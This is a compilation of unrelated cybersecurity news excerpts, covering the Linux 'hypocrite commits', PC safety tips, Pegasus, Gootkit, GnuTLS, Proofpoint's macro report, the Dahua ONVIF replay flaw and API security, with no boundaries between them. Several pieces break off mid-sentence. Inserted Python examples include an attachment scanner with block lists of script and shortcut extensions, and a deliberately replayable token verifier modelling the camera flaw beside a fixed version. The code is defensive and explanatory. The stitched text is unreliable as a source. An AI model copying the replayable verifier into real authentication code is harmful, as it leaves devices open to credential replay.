They called these patches hypocrite commits, and the idea was to show that two peculiar patches submitted at different times could, in theory, be combined later on to introduce a security hole, effectively each contributing a sort of “half-vulnerability” that wouldn’t be spotted as a bug on its own.
As you can imagine, the Linux kernel team did not take kindly to being experimented on in this way without permission, not least because they were faced with cleaning up the mess:
Please stop submitting known-invalid patches. Your professor is playing around with the review process in order to achieve a paper in some strange and bizarre way. This is not ok, it is wasting our time, and we will have to report this, AGAIN, to your university…
Whether you are getting ready for the back-to-school season, receiving a new work laptop, or eyeing a new gaming PC, learn the steps to protect your new machine from cyberthreats.
With Windows 11 making headlines for all the right reasons, it could be a great time to invest in a new PC for the family or the home office. But any new household computing device should come with an attendant safety warning. Hackers will be after your data the minute it’s connected to the internet. And they have numerous ways to get it.
That’s why you need to think about cybersecurity even before plugging your machine in and switching it on. Take time out now to refresh your memory and make cyber-hygiene a number one priority.
What are the main threats to my PC?
As soon as you’re connected to the internet, malicious actors will be looking to steal your data, encrypt and hold your machine ransom, lift financial details, secretly mine for cryptocurrency, and much more. They’ll do so via some tried and true methods, which often rely on cracking, stealing or guessing passwords, or exploiting software vulnerabilities. Top threats include:
Phishing: One of the oldest con tricks in the book. Cybercriminals masquerade as legitimate and trustworthy sources (banks, tech providers, retailers etc) and try to persuade users into clicking on links and/or opening attachments in emails. Doing so will take users to a spoofed site requesting that they fill in personal information (like logins and/or address/financial details) or could trigger a covert malware download.
Drive-by downloads and malicious ads: Sometimes merely visiting an infected website, or a site running a malicious ad, can trigger a malware download. We may assume that well-known sites are less likely to be compromised in this way because they are better resourced and can afford stronger protection, but there have been plenty of counter-examples over the years showing that this is not always the case. That’s why it’s essential to invest in security software from a reputable provider and to ensure that your browser’s security settings are correct.
Digital skimming: Hackers may also compromise the payment pages of e-commerce sites with malware designed to silently harvest your card data as it is entered. This is difficult to guard against as the issue is with the provider. However, shopping with better-known sites can reduce risk.
Malicious apps and files: Cybercriminals also hide malware inside legitimate-looking applications and downloads. Many of these are posted to online forums, P2P sites, and other third-party platforms. That’s why it makes sense to download only from trusted sources, and to use an effective security software tool to scan for malicious software.
Ten tips to keep your computer safe
Many of the below steps may be taken care of automatically by your PC manufacturer/Microsoft, but it pays to dig a little deeper to make sure all the settings are as secure as you need them to be. Here are our top 10 tips for computer safety:
Apply automatic updates for the OS and any software running on the PC
Remove bloatware that often comes preinstalled on PCs. If you don’t recognize a program, check what it does before removing it so you don’t break something the system needs. The fewer pieces of software on the machine, the fewer bugs there are for attackers to exploit
Install multi-layered security software from a reputable third-party vendor and keep it up to date
Configure backups, and ideally back up a copy of data to a remote storage device kept offline
Secure the browser by adjusting privacy and security settings and ensuring it is on the latest version
Switch on and configure your firewall on the OS and home router, ensuring it is protected with a strong password
Download a multi-factor authentication app in order to help protect your accounts from being hijacked via phishing and other attacks
Avoid plugging in USB devices that you don’t own, in case they are loaded with malware
Use a password manager to ensure that all your credentials are unique, strong, and hard-to-crack
Only download apps/files from trusted sources and avoid pirated material, which can often be booby-trapped with malware
It goes without saying that, even by following these best practices, you could still be at risk when browsing online. Always proceed with caution, don’t reply to unsolicited emails/online messages, and ensure device encryption is switched on.
Internet attacks on computer systems are pervasive. It can take from less than a minute to as much as eight hours for an unprotected machine connected to the Internet to be completely compromised. It is the information security architect’s job to prevent attacks by securing computer systems. This book describes both the process and the practice of assessing a computer system’s existing information security posture. Detailing the time-tested practices of experienced security architects, Securing Systems explains how to deliver the right security at the right time in the implementation lifecycle.
Many experts often overlook hardware based security and its vital importance in establishing a secure workspace.
When it comes to cybersecurity, everyone likes to talk about software and the dangers that it poses. However, people often overlook hardware-based security and its vital importance in establishing a secure workspace. This is attributed to a general lack of knowledge when it comes to hardware security and how it works. So, it’s time to bust some myths that you might think are true when it comes to hardware security.
Myth #1: We never hear about hardware-based attacks, they don’t exist!
Just because you don’t hear about the problem frequently, it doesn’t mean that it doesn’t exist. Usually, cyberattacks that make the headlines are those involving large corporations that have fallen victim to a software-based attack carried out by infamous cybercrime syndicates. These stories are juicy and scandalous and entice audiences to read the article, generating more clicks onto the media outlet’s website. Additionally, many businesses choose to withhold information pertaining to hardware-based attacks as it indicates insufficient physical security, which reflects negatively upon the business. Another reason why you don’t often hear about hardware-based attacks is that enterprises who fall victim to them are oblivious to it. When an enterprise gets breached, the natural assumption is that it was due to a software vulnerability or phishing scam. Such misunderstanding, coupled with a lack of resources to detect a hardware attack tool, results in the attack method getting misconstrued.
However, that is not to say that hardware-based attacks don’t receive any media attention. A great example that receives public resonance concerns ATMs. These cash dispensing machines are becoming a go-to target for cybercriminals because of the instant payout. Instead of using brute force attacks on ATMs, cybercriminals can now just attach a hardware attack tool, known as a Black Box, to the internal computer to trick it into releasing cash through a MiTM attack. Since 2021, Black Box attacks have been on the rise and have amounted to losses of 1.5 million Euros in Europe alone.
Myth #2: We have security measures in place, and all our employees use VPNs– we are protected!
Yes, security measures like NAC, IDS/IPS, firewalls and VPNs definitely provide some level of protection. However, malicious actors are continually evolving and finding new attack methods, which means exploiting blind spots, one of which is the hardware domain. Existing security solutions lack visibility into the Physical Layer (Layer 1), leaving them unfit to defend against, let alone identify, hardware-based attack tools. These malicious devices are designed to evade detection by operating on the Physical Layer and mimicking human-like commands and executions, making them extremely dangerous as they can carry out a variety of harmful attacks without any obstacles in their way. If you are unable to determine all your assets’ hardware information within 10 seconds, you are, in fact, not protected.
Myth #3: “We don’t use USBs, so why should it concern us”
That’s a line we’ve heard many times before, but here’s the thing: you do, and it should!
Sure, your organization might not use flash drives, and your EPP/EDR solution might be able to block phones, keyboards and mice with certain VID/PIDs. That’s great, but what about the keyboards employees use to type? And the mice they use to navigate? Correct, those are USB devices too. They might be authorized, but that doesn’t mean they can’t be impersonated by a covert spoofing device. So long as there are HIDs in the work environment, there is the risk that one (or more) may be illegitimate. And without Physical Layer visibility, there’s no mechanism in place to determine what’s legitimate or not.
Myth #4: Why would anyone want to hack us; we aren’t an interesting target?
That’s where you’re wrong. In today’s day and age, almost anything that has data is of value and there is someone out there who wants to access it, no matter how mundane it could be. Not all hackers target large nuclear facilities or governmental institutions; the risk is usually too high for most cybercriminals. Your company, however, is a prime target – there’s data and it’s accessible. Whether the perpetrator wants to steal information for monetary gain, access it to gain a competitive advantage, or encrypt it in a ransomware attack, your company provides that opportunity and a hardware attack tool can do the job.
In short, every enterprise is a target for malicious actors; it can happen to anyone for any number of reasons. The important thing to remember is that you can prepare and build your company’s resistance to these attacks by gaining visibility on the Physical Layer through hardware-based security.
About the author: Julien Katzenmaier, Content Writer at Sepio
Pegasus is listening: Q&A with Paul Rusesabagina’s daughter Carine Kanimba
You may not recognize the name Carine Kanimba, but you have probably heard of her dad: Paul Rusesabagina. He was the manager of Hôtel des Milles Collines and rather famously decided to shelter some 1,200 mostly Tutsi Rwandans in his hotel during the 1994 genocide in Rwanda. Don Cheadle played him in the movie Hotel Rwanda.
After, Rusesabagina became a superstar ambassador of human rights. He wrote an autobiography about his work during the genocide; President George W. Bush awarded him the Medal of Freedom; and he went on the speakers’ circuit not just talking about 1994 – but criticizing the current government of President Paul Kagame for trampling on human rights.
In August 2020, Rusesabagina boarded a private jet for what he thought would be a trip to Burundi, but instead he was rendered to Rwanda. He has since been sentenced to 25 years in prison.
Carine Kanimba was on Capitol Hill last week to talk not just about her dad (who adopted sisters Carine and Anaïse shortly after the genocide), but also her recent discovery that she’s been targeted by a commercial spyware program called Pegasus. And she believes the Rwandan government was behind it.
Pegasus spyware is the brainchild of an Israeli company called NSO Group and it has been found on the phones of so many activists around the world it has become a kind of cautionary tale about the commercial spyware industry. It has been linked to the murder of journalist Jamal Khashoggi, discovered on the phones of Mexican opposition leaders, Catalonian politicians, and journalists and lawyers around the world. (In a statement, NSO Group told Click Here that it “thoroughly investigates any claim for illegal use of its technology by customers, and terminates contracts when illegal use is found.”)
The Click Here podcast sat down with Kanimba shortly after her Congressional testimony to talk to her about her role as a human rights advocate, what it is like finding oneself on the receiving end of a spyware campaign, and why she is confident she will win her father’s release. The interview has been edited and shortened for clarity.
CLICK HERE: We wanted to start by saying we’re very sorry about what you’re going through with your father…
According to a new Tessian report, 30% employees do not think they personally play a role in maintaining their company’s cybersecurity posture.
What’s more, only 39% of employees say they’re very likely to report a security incident, making investigation and remediation even more challenging and time-consuming for security teams. When asked why, 42% of employees said they wouldn’t know if they had caused an incident in the first place, and 25% say they just don’t care enough about cybersecurity to mention it.
Virtually all IT and security leaders agreed that a strong security culture is important in maintaining a strong security posture. Yet, despite rating their organization’s security 8 out of 10 on average, three-quarters of organizations experienced a security incident in the last 12 months.
The report suggests this could stem from a reliance on traditional training programs; 48% of security leaders say training is one the most important influences on building a positive security posture. But the reality is that employees aren’t engaged; just 28% of UK and US workers say security awareness training is engaging and only 36% say they’re paying full attention. Of those who are, only half say it’s helpful, while another 50% have had a negative experience with a phishing simulation. With recent headlines depicting how phishing simulations can go awry, negative experiences like these further alienate employees and decrease engagement.
The report also reveals a disconnect when it comes to reporting security risks. Eighty percent of security leaders believe robust feedback loops are in place to report incidents, but less than half of employees feel the same, suggesting clearer processes are needed so that security teams have greater visibility of risk in their organization.
Gootkit access-as-a-service (AaaS) malware is back with tactics and fileless delivery of Cobalt Strike beacons.
Gootkit runs on an access-as-a-service model: it is used by different groups to drop additional malicious payloads on compromised systems. Gootkit has been known to use fileless techniques to deliver threats such as the SunCrypt and REvil (Sodinokibi) ransomware, the Kronos trojan, and Cobalt Strike.
In the past, Gootkit distributed malware masquerading as freeware installers, now it uses legal documents to trick users into downloading these files.
The attack chain starts with a user searching for specific information in a search engine. Attackers use SEO poisoning (black-hat SEO) to place a website compromised by the Gootkit operators among the results.
Upon visiting the site, the victim sees what looks like an online forum thread directly answering their query. The forum hosts a ZIP archive containing the malicious .js file, which is used to establish persistence and load a Cobalt Strike binary into the memory of the infected system.
“When the user downloaded and opened this file, it spawned an obfuscated script which, through registry stuffing, installed a chunk of encrypted codes in the registry and added scheduled tasks for persistence. The encrypted code in the registry was then reflectively loaded through PowerShell to reconstruct a Cobalt Strike binary that runs directly in the memory filelessly.” reads the analysis published by Trend Micro. “Much of what we have just described is still in line with the behavior we reported in 2020, but with a few minor updates. This indicates that Gootkit Loader is still actively being developed and has proved successful in compromising unsuspecting victims.”
The experts pointed out that the encrypted registry payloads now use a custom text-replacement algorithm instead of base64 encoding.
The Cobalt Strike binary loaded directly to the memory of the victim’s system has been observed connecting to the IP address 89[.]238[.]185[.]13, which is a Cobalt Strike C2.
“One key takeaway from this case is that Gootkit is still active and improving its techniques. This implies that this operation has proven effective, as other threat actors seem to continue using it. Users are likely to encounter Gootkit in other campaigns in the future, and it is likely that it will use new means of trapping victims.” concludes the report. “This threat also shows that SEO poisoning remains an effective tactic in luring unsuspecting users. The combination of SEO poisoning and compromised legitimate websites can mask indicators of malicious activity that would usually keep users on their guard. Such tactics highlight the importance of user awareness and the responsibility of website owners in keeping their cyberspaces safe.”
The best-known cryptographic library in the open-source world is almost certainly OpenSSL.
Firstly, it’s one of the most widely-used, to the point that most developers on most platforms have heard of it even if they haven’t used it directly.
Secondly, it’s probably the most widely-publicised, sadly because of a rather nasty bug known as Heartbleed that was discovered more than eight years ago.
Despite being patched promptly (and despite reliable workarounds existing for developers who couldn’t or wouldn’t update their vulnerable OpenSSL versions quickly), Heartbleed remains a sort of “showcase” bug, not least because it was one of the first bugs to be turned into an aggressive PR vehicle by its discoverers.
With an impressive name, a logo all of its own, and a dedicated website, Heartbleed quickly became a global cybersecurity superstory, and, for better or worse, became inextricably linked with mentions of the name OpenSSL, as though the danger of the bug lived on even after it had been excised from the code.
Life beyond OpenSSL
But there are several other open-source cryptographic libraries that are widely used as well as or instead of OpenSSL, notably including Mozilla’s NSS (short for Network Security Services) and the GNU project’s GnuTLS library.
As it happens, GnuTLS just patched a bug known as CVE-2022-2509, reported in the project’s security advisory GNUTLS-SA-2022-07-07.
This patch fixes a memory mismanagement error known as a double-free, in which the same block of heap memory is released twice, corrupting the allocator’s bookkeeping.
Microsoft’s announcement that it would block macros in Microsoft Office apps by default didn’t stop threat actors—they have simply resorted to new tricks.
“Threat actors across the landscape responded by shifting away from macro-based threats,” Proofpoint researchers noted in a blog post. In fact, an analysis of campaign data, “which include threats manually analyzed and contextualized,” showed the use of VBA and XL4 Macros ticked down 66% or so between October 2021 and June 2022.
“While Proofpoint observed a notable increase in other attachment types, macro-enabled documents are still used across the threat landscape,” the researchers wrote, explaining that the tactics, techniques and procedures (TTPs) have changed, with miscreants turning to use of container files—like ISO and RAR—and Windows Shortcut files to pass malware along, according to Proofpoint research.
Threat actors have long used VBA macros “to automatically run malicious content when a user has actively enabled macros in Office applications. XL4 macros are specific to the Excel application, but can also be weaponized by threat actors,” researchers pointed out. “Typically, threat actors distributing macro-enabled documents rely on social engineering to convince a recipient the content is important, and enabling macros is necessary to view it.”
Microsoft’s block keys on the Mark of the Web (MOTW): a Zone.Identifier alternate data stream that browsers and mail clients attach to files downloaded from the internet, and which Office consults to decide whether a document’s macros should be blocked. But bad actors can bypass MOTW by wrapping the document in a container file format.
By using container file formats like ISO (.iso), RAR (.rar), ZIP (.zip) and IMG (.img) files to send macro-enabled documents, “ … the ISO, RAR, etc. files will have the MOTW attribute because they were downloaded from the internet, but the document inside, such as a macro-enabled spreadsheet, will not,” researchers noted. “When the document is extracted, the user will still have to enable macros for the malicious code to automatically execute, but the file system will not identify the document as coming from the web.”
Container files can also carry payloads directly: once opened, they may hold “additional content such as LNKs, DLLs or executable (.exe) files that lead to the installation of a malicious payload.”
“The change to block macros by default is a very good thing; has been suggested for years and it’s good Microsoft is finally doing it,” said Rob Jenks, SVP strategy and business at Tanium. He explained that “as with all security techniques, it’s not a silver bullet and attackers inevitably move on to the next attack pathway(s)—so the findings aren’t surprising.”
But “regarding the new attacks, there are other restrictions on not trusting zip content, so these other mechanisms throw more consent dialogs into the user’s face, potentially making a phishing attack less reliable,” Jenks said.
Proofpoint researchers have not only noted a two-thirds decrease in macro-enabled documents leveraged as attachments in email-based threats, but they observed “the number of campaigns leveraging container files including ISO and RAR, and Windows Shortcut (LNK) attachments increased nearly 175%,” researchers said.
“They attribute the increase in part to the uptick in use of ISO and LNK files in campaigns. Cybercriminal threat actors are increasingly adopting these as initial access mechanisms, such as actors distributing Bumblebee malware,” they said. “The use of ISO files increased over 150% between October 2021 and June 2022. More than half of the 15 tracked threat actors that used ISO files in this time began using them in campaigns after January 2022.”
Most notably, LNK files have emerged as a go-to for threat actors—at least 10 of them have begun using LNK files since February.  In fact, the number of campaigns containing LNK files exploded an incredible 1,675% since October 2021.
While fewer campaigns are using XL4 macros, Proofpoint did see a spike in macro use in March 2022, which researchers attributed to an uptick in campaigns with higher volumes of messages conducted by the TA542 actor delivering Emotet. “Typically, TA542 uses Microsoft Excel or Word documents containing VBA or XL4 macros,” the researcher wrote. “Emotet activity subsequently dropped off in April and it began using additional delivery methods including Excel Add-In (XLL) files and zipped LNK attachments in subsequent campaigns.”
The adoption of ISO and other container file formats is driving the pivot away from macro-enabled documents to different file types that can bypass the macro-blocking protections offered by Microsoft. “Such filetypes can bypass Microsoft’s macro blocking protections, as well as facilitate the distribution of executables that can lead to follow-on malware, data reconnaissance and theft and ransomware,” said Proofpoint researchers, who called the change “one of the largest email threat landscape shifts in recent history.”
Proofpoint has also observed a slight increase in threat actors using HTML attachments to deliver malware. The number of malware campaigns using HTML attachments more than doubled from October 2021 to June 2022, but the overall number remains low. Proofpoint researchers also observed threat actors increasingly adopt HTML smuggling, a technique used to “smuggle” an encoded malicious file within a specially crafted HTML attachment or web page.
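The common thread between the Gootkit lure earlier on this page (a ZIP archive carrying a .js loader) and the container-file shift Proofpoint describes is that the outer archive gets the Mark of the Web while the members inside it do not, so a mail gateway has to look inside the container rather than trust the attachment’s own extension. The following Python is an added example, not code from Proofpoint, Trend Micro or Microsoft: it walks a ZIP attachment (recursing into nested ZIPs, with a size guard against zip bombs), reports macro-capable Office documents, shortcuts, scripts and executables, and returns a block/allow verdict. The sample attachment is constructed in code and its members are inert placeholders; ISO, IMG and RAR containers are only reported here, since opening them needs other parsers.

```python
import io
import os
import zipfile
from typing import List, Tuple

# Member types that justify blocking or quarantining a container attachment.
MACRO_CAPABLE_DOCS = {".doc", ".dot", ".xls", ".xlt", ".xla", ".ppt",
                      ".docm", ".dotm", ".xlsm", ".xltm", ".xlam", ".pptm", ".ppam"}
EXECUTABLE_LIKE = {".lnk", ".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta",
                   ".exe", ".dll", ".scr", ".cpl", ".xll", ".msi", ".bat", ".cmd", ".ps1"}
OTHER_CONTAINERS = {".iso", ".img", ".rar", ".7z", ".cab", ".vhd"}
MAX_MEMBER_BYTES = 50 * 1024 * 1024  # refuse to expand anything larger (zip-bomb guard)

Finding = Tuple[str, str]  # (path inside the container, reason)


def inspect_zip(data: bytes, prefix: str = "", depth: int = 0, max_depth: int = 3) -> List[Finding]:
    """Walk a ZIP (recursing into nested ZIPs) and report members that should not arrive by mail."""
    findings: List[Finding] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            path = prefix + info.filename
            ext = os.path.splitext(info.filename)[1].lower()
            if info.file_size > MAX_MEMBER_BYTES:
                findings.append((path, "oversized member, not inspected"))
            elif ext in MACRO_CAPABLE_DOCS:
                findings.append((path, "macro-capable Office document"))
            elif ext in EXECUTABLE_LIKE:
                findings.append((path, "script, shortcut or executable"))
            elif ext == ".zip":
                if depth >= max_depth:
                    findings.append((path, "nested ZIP beyond depth limit"))
                else:
                    findings.extend(inspect_zip(zf.read(info), path + "/", depth + 1, max_depth))
            elif ext in OTHER_CONTAINERS:
                findings.append((path, "nested container format not opened here"))
    return findings


def verdict(findings: List[Finding]) -> str:
    """Gateway decision: any finding is enough to block, since none of these belong in mail."""
    return "block" if findings else "allow"


def build_sample_attachment() -> bytes:
    """Constructed lure for this example: a benign note, a macro-enabled workbook,
    a Windows shortcut, and a nested ZIP holding a .js loader. All bodies are inert placeholders."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("docs/loader.js", "// placeholder script body (constructed, inert)")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("README.txt", "Please review the attached forecast.")
        z.writestr("Q3_forecast.xlsm", b"placeholder bytes, not a real workbook")
        z.writestr("agreement/contract.lnk", b"placeholder bytes, not a real shortcut")
        z.writestr("docs.zip", inner.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    hits = inspect_zip(build_sample_attachment())
    for path, reason in hits:
        print(f"{path}: {reason}")
    print("verdict:", verdict(hits))
```

Extension matching is deliberately the first, cheap layer: a real gateway would also sniff member content (OLE/OOXML structure, the LNK header, script text) because an attacker can rename a member, and it would apply the same walk to ISO and IMG images, which is where most of the 2022 growth described above happened.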
A vulnerability, tracked as CVE-2022-30563, impacting Dahua IP Camera can allow attackers to seize control of IP cameras.
The CVE-2022-30563 vulnerability impacting Dahua IP Camera can allow attackers to seize control of IP cameras. The issue affects Dahua’s implementation of the Open Network Video Interface Forum (ONVIF).
ONVIF provides and promotes standardized interfaces for effective interoperability of IP-based physical security products.
The vulnerability was discovered by researchers from Nozomi Networks and received a CVSS score of 7.4.
“We’re publishing the details of a new vulnerability (tracked under CVE-2022-30563) affecting the implementation of the Open Network Video Interface Forum (ONVIF) WS-UsernameToken authentication mechanism in some IP cameras developed by Dahua, a very popular manufacturer of IP-based surveillance solutions.” reads the advisory published by Nozomi Networks. “This vulnerability could be abused by attackers to compromise network cameras by sniffing a previous unencrypted ONVIF interaction and replaying the credentials in a new request towards the camera.”
ONVIF-conformant products allow users to perform a variety of actions on the remote device through a set of standardized Application Programming Interfaces (APIs), including watching camera footage, locking or unlocking a smart door, and performing maintenance operations.
The flaw resides in the “WS-UsernameToken” authentication mechanism implemented by Dahua in some of its IP cameras. Because the implementation does not check for replay attacks, a threat actor who sniffs an unencrypted ONVIF interaction can replay the captured credentials indefinitely in new requests to the camera, which accepts them as valid authenticated requests.
With those replayed credentials an attacker can add an administrator account and use it to obtain full access to the device, for example to watch the camera’s live footage.
An attacker can conduct this attack by capturing one unencrypted ONVIF request authenticated with the WS-UsernameToken schema.
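The WS-UsernameToken mechanism is only as strong as the server’s handling of its nonce and timestamp: the client sends a Username, a random Nonce, a Created timestamp and PasswordDigest = Base64(SHA-1(nonce + created + password)), and the server is supposed to reject a stale Created and never accept the same nonce twice. The following Python is an added example and is not Dahua’s firmware, Nozomi’s proof of concept or any ONVIF library; it builds a token the way a client does, then shows two verifiers side by side: one that checks only the digest (the behaviour the advisory describes, where a sniffed token works forever) and one that adds the freshness window and nonce cache. The user name, password, nonce and timestamps are constructed for the example.

```python
import base64
import binascii
import hashlib
import hmac
import os
from datetime import datetime, timedelta, timezone
from typing import Dict, Optional

CREATED_FMT = "%Y-%m-%dT%H:%M:%SZ"


def parse_created(created: str) -> datetime:
    """Parse the WS-Security Created timestamp (UTC, second resolution)."""
    return datetime.strptime(created, CREATED_FMT).replace(tzinfo=timezone.utc)


def make_username_token(username: str, password: str, nonce: Optional[bytes] = None,
                        created: Optional[str] = None) -> Dict[str, str]:
    """Client side: PasswordDigest = Base64(SHA-1(nonce || created || password)),
    as in the WS-Security UsernameToken profile that ONVIF builds on."""
    nonce = nonce if nonce is not None else os.urandom(16)
    created = created or datetime.now(timezone.utc).strftime(CREATED_FMT)
    digest = hashlib.sha1(nonce + created.encode() + password.encode()).digest()
    return {
        "Username": username,
        "Nonce": base64.b64encode(nonce).decode(),
        "Created": created,
        "PasswordDigest": base64.b64encode(digest).decode(),
    }


def _digest_ok(token: Dict[str, str], password: str) -> bool:
    """Recompute the digest for the presented nonce/created and compare in constant time."""
    try:
        nonce = base64.b64decode(token["Nonce"], validate=True)
        presented = base64.b64decode(token["PasswordDigest"], validate=True)
    except (KeyError, binascii.Error):
        return False
    expected = hashlib.sha1(nonce + token["Created"].encode() + password.encode()).digest()
    return hmac.compare_digest(expected, presented)


class ReplayableVerifier:
    """Models the flawed behaviour described above: the digest is checked, but nothing
    stops the same (Nonce, Created, PasswordDigest) triple from being accepted forever."""

    def __init__(self, users: Dict[str, str]):
        self.users = users

    def verify(self, token: Dict[str, str]) -> bool:
        password = self.users.get(token.get("Username", ""))
        return password is not None and _digest_ok(token, password)


class ReplaySafeVerifier:
    """Same digest check plus the two controls the profile expects: Created must be
    fresh, and a nonce is accepted at most once within the freshness window."""

    def __init__(self, users: Dict[str, str], window: timedelta = timedelta(minutes=5)):
        self.users = users
        self.window = window
        self._seen: Dict[bytes, datetime] = {}  # nonce -> time after which it can be forgotten

    def verify(self, token: Dict[str, str], now: Optional[datetime] = None) -> bool:
        now = now or datetime.now(timezone.utc)
        password = self.users.get(token.get("Username", ""))
        if password is None:
            return False
        try:
            created = parse_created(token["Created"])
            nonce = base64.b64decode(token["Nonce"], validate=True)
        except (KeyError, ValueError, binascii.Error):
            return False
        if abs(now - created) > self.window:
            return False  # stale or far-future timestamp
        self._seen = {n: t for n, t in self._seen.items() if t > now}  # forget expired nonces
        if nonce in self._seen:
            return False  # replay of a token already accepted
        if not _digest_ok(token, password):
            return False
        self._seen[nonce] = created + self.window
        return True


if __name__ == "__main__":
    users = {"admin": "correct-horse-battery"}  # constructed credential
    captured = make_username_token("admin", users["admin"])  # what a sniffer on the LAN would see
    flawed = ReplayableVerifier(users)
    print("flawed device, first then replay:", flawed.verify(captured), flawed.verify(captured))
    fixed = ReplaySafeVerifier(users)
    print("fixed device, first then replay: ", fixed.verify(captured), fixed.verify(captured))
```

Note what the nonce cache does and does not buy: it stops an attacker from reusing a sniffed token, but the password itself is still only protected by SHA-1 over a short string, so the real fix for an unencrypted ONVIF session is TLS (or at least a long random password and a segregated camera network), with replay protection as the second layer.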
The following versions of Dahua video products are affected:
Dahua ASI7XXX: Versions prior to v1.000.0000009.0.R.220620
Dahua IPC-HDBW2XXX: Versions prior to v2.820.0000000.48.R.220614
Dahua IPC-HX2XXX: Versions Prior to v2.820.0000000.48.R.220614
The vendor addressed the issue with the release of a patch on June 28, 2022.
“In addition to building security, surveillance cameras are used throughout many critical infrastructure sectors such as oil & gas, power grids, telecommunications, etc. These cameras are used to oversee many production processes, providing remote visibility to process engineers. Threat actors, nation-state threat groups in particular, could be interested in hacking IP cameras to help gather intel on the equipment or production processes of the target company.” concludes Nozomi. “This information could aid in reconnaissance conducted prior to launching a cyberattack. With more knowledge of the target environment, threat actors could craft custom attacks that can physically disrupt production processes in critical infrastructure.”
A CISO’s mandate is to empower the business to move forward on key growth initiatives and simultaneously reduce risk. To this end, they must continuously evaluate and weigh the security ramifications of many strategic initiatives, ultimately weighing the potential impact on a company’s:
• Speed to market.
• Competitive advantage.
• Brand reputation.
By focusing on how their security infrastructure helps or hinders delivery on those three fronts, CISOs help drive business success. In today’s landscape, one new area has emerged that is integrally connected to all three of those company dynamics: the use of APIs to fuel innovation.
APIs are eating the world.
APIs are essential for companies to support their innovative and revenue-generating digital transformation initiatives. Open banking services, mobile and online services, digital information sharing apps, brands like DoorDash, Uber, PayPal, Spotify, Netflix, Tesla—you name it—all require APIs to function.
Companies are developing and pushing out APIs faster, and in larger quantities, than ever before. APIs allow companies to build and bring advanced services to market, opening up new avenues of business and revenue streams. Digitalization hastened this trend, and Covid accelerated its implementation. Companies had to quickly deploy remote services for workers and customers and build product integrations to support myriad devices—all of which demanded APIs. It’s no wonder that the public API hub Postman hit a record 20 million users earlier this year.
However, because APIs share highly sensitive data with customers, partners and employees, they have also become a very attractive target for attackers. CISOs have recognized the risk.
The faster a business can bring new services to market, the faster the benefits. For some companies (under Covid), speed to market meant the difference between keeping the business up and running versus shutting down operations. API usage ensured that organizations were open for business.
Businesses must always assess the value and the costs in terms of both achieving or losing the speed-to-market race. They must consider the obstacles that could prevent speed to market. In the case of APIs, security threats pose an enormous obstacle. They can slow down rollouts or, even worse, make them untenable.
By protecting APIs from exploitation, companies ensure their ability to drive speed to market, growth opportunities and competitive advantage.
APIs deliver a competitive advantage.
Speed to market is an important underlying factor that contributes to an organization’s competitive advantage. As an industry front runner, businesses have an opportunity to gain the lion’s share of a market and its profits.
In financial services, competitive advantage is a critical business objective, and technology transformation is its core strategic component. Fintech companies have fueled customer expectations, and open banking is right behind them, offering unimaginable innovation and conveniences by easily linking mobile apps to banking accounts.
Banking and financial institutions must stay on the cutting edge of these services to compete and stay relevant. APIs power these capabilities and allow institutions to leapfrog ahead of the competition.
However, security threats and regulatory noncompliance can derail an API implementation and result in costly fines. Businesses must ensure safe passage between emerging applications and customers’ valuable financial data. APIs are the access point to PII and other important data assets, which attackers target for their own gain and to the detriment of the business.
Dedicated API security is the cost of doing business.
The monetary growth opportunities promised by APIs are immense, but to harness them, CISOs must ensure the protection of their APIs. APIs support the interconnectivity of a company’s crown jewels—the essential and sensitive data that businesses require to deliver their digital goods and services.
Every company that is developing software has become an API-driven company. For API-driven companies, protecting those APIs is no longer a question—it’s simply the cost of doing business in a digitally transformed landscape. Without dedicated API security to protect these crucial connectivity tools, companies put everything at risk—speed to market, competitive advantage and the brand itself.
Last but not least, CISOs must build a collaborative approach to API security. APIs touch all areas of the business. CISOs need to take an active role in educating teams about their API security initiatives and their importance in reducing the company’s risks. CISOs must provide the answers and insights that empower others to help meet security goals.
CISO after CISO will tell you that creating a strong, cross-functional “security-aware” culture continues to be their number one priority. To generate this security mindset, leaders must prioritize relationships, acknowledge everyone’s contribution to security and continuously communicate the vital importance of security to achieve overall business objectives.
